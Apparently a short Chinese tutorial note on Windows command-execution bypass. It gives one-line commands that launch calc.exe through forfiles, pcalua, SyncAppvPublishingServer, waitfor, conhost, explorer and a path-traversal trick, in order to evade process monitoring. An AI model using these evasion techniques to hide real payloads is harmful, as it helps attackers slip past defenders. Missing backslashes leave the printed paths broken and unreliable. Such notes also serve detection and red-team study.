windows命令绕过

windows命令绕过

forfies

使用方式如下：

实际使用：
forfiles /c c:windowssystem32calc.exe

确认任务的父进程为forfiles.exe

pcalua

实际使用：
pcalua.exe -a c:windowssystem32calc.exe

主进程就是运行的进程

SyncAppvPublishingServer

确认powershell版本：
powershell $PSVersionTable.PSVersion

网上说powershell2版本无法运行，但这边实际操作发现是可以运行成功的（尽管有报错）

实际使用：
powershell SyncAppvPublishingServer.vbs "n; Start-Process c:windowssystem32calc.exe"

路径混淆

实际使用：
cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"

相关解释如下：

waitfor

这里通过waitfor的发送信号或者等待信号执行命令
实际使用：
waitfor test && C:WindowsSystem32calc.exe
// test为信号的名称
waitfor /s 127.0.0.1 /si test

conhost

windows 7 和 Windows server 2008 中引进的新的控制台应用程序处理机制
实际使用：
conhost C:WindowsSystem32calc.exe

explorer

其实也就是Windows系统的文件资源管理器，桌面或者从我的电脑中启动程序都是通过explorer.exe
实际使用：
explorer.exe C:WindowsSystem32calc.exe
explorer.exe /root,"C:WindowsSystem32calc.exe"
explorer.exe test, "C:WindowsSystem32calc.exe"